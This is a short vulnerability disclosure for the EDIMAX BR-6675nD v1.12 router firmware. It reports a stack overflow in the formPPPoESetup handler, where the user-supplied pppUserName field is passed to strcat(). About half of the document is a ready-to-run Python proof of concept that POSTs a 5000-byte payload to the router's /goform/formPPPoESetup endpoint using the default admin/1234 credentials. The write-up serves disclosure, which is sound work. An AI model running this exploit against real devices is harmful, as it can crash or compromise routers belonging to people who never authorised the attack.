Overview

• The device's official website: https://download.edimax.com/mw/cufiles/files/download/Firmware/BR6675ND_v1.12(TaiwanOnly).zip

Affected version

BR-6675nD v1.12

Vulnerability details

The EDIMAX BR-6675nD v1.12 firmware has a stack overflow vulnerability in the formPPPoESetup function. The v35 variable receives the pppUserName parameter from a POST request. However, since the user can control the input of pppUserName, the statement strcat() can cause a buffer overflow.

POC

import requests

ip = "192.168.2.1"

payload = "A"*5000
data = {
    "submit-url":     "",
    "pppConnect":     "",
    "pppConnect1":    "",
    "pppDisconnect":  "",
    "pppDisconnect1": "",
    "wanMode":        "",
    "pppServName":    "",
    "pppMTU":         "",
    "pppUserName":    payload,
}
url = f'http://{ip}/goform/formPPPoESetup'

res = requests.post(url=url, data=data, auth=("admin", "1234"), verify=False)
print(res)